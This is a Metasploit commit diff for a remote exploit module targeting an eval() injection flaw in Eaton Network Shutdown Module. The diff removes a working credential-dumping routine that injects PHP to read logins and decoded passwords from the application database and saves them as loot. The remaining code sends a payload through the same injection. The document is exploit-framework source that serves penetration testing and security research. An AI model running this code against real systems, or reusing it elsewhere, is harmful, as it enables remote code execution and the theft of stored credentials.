Strip the credential dumping stuff (making it auxiliary)
Also a little description updateunstable
sinn3r
parent
6b524ff22a
commit
fd2296317d
|
|
@ -18,8 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a vulnerability in lib/dbtools.inc which uses
|
||||
unsanitized user input inside a eval() call. Additionally the base64 encoded
|
||||
user credentials are extracted from the database of the application.
|
||||
|
||||
user credentials are extracted from the database of the application. Please
|
||||
note that in order to be able to steal credentials, the vulnerable service
|
||||
must have at least one USV module (an entry in the "nodes" table in mgedb.db)
|
||||
},
|
||||
'Author' => [ 'h0ng10' ], # original discovery, msf module
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
@ -46,9 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(4679),
|
||||
OptBool.new('READ_CREDS', [ true, 'Extract credentials from the target db', true ]),
|
||||
|
||||
Opt::RPORT(4679)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
@ -65,42 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
def read_credentials()
|
||||
pattern = rand_text_numeric(10)
|
||||
users_var = rand_text_alpha(10)
|
||||
user_var = rand_text_alpha(10)
|
||||
php = <<-EOT
|
||||
$#{users_var} = &queryDB("SELECT * FROM configUsers;");
|
||||
foreach($#{users_var} as $#{user_var}) {
|
||||
print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
|
||||
} die();
|
||||
EOT
|
||||
|
||||
print_status("Reading user credentials from the database")
|
||||
response = execute_php_code(php)
|
||||
|
||||
if not response or response.code != 200 then
|
||||
print_error("Failed: Error requesting page")
|
||||
return
|
||||
end
|
||||
|
||||
credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
|
||||
|
||||
return if credentials.length == 0
|
||||
print_status("Got #{credentials.length} record(s):")
|
||||
cred_txt = "#Username:Password\n"
|
||||
credentials.each do |record|
|
||||
print_status("Username: #{record[0]}, Password: #{record[1]}")
|
||||
cred_txt << "#{record[0]}:#{record[1]}\n"
|
||||
end
|
||||
|
||||
loot_name = "eaton.nsm.credentials"
|
||||
loot_type = "text/plain"
|
||||
loot_filename = "eaton_nsm_creds.txt"
|
||||
loot_desc = "Eaton Network Shutdown Module credentials"
|
||||
store_loot(loot_name, loot_type, datastore['RHOST'], cred_txt, loot_filename, loot_desc)
|
||||
end
|
||||
|
||||
def execute_php_code(code, opts = {})
|
||||
param_name = rand_text_alpha(6)
|
||||
padding = rand_text_alpha(6)
|
||||
|
|
@ -123,13 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 5)
|
||||
})
|
||||
res
|
||||
end
|
||||
|
||||
def exploit
|
||||
read_credentials unless datastore['READ_CREDS'] == false
|
||||
print_status("Sending payload")
|
||||
print_status("#{rhost}:#{rport} - Sending payload")
|
||||
execute_php_code(payload.encoded)
|
||||
handler
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue